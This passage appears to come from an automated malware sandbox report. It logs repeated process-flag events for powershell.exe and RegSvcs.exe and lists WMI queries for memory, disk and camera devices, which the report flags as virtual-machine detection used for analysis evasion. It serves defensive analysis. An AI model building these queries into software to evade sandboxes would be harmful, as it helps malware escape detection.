Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

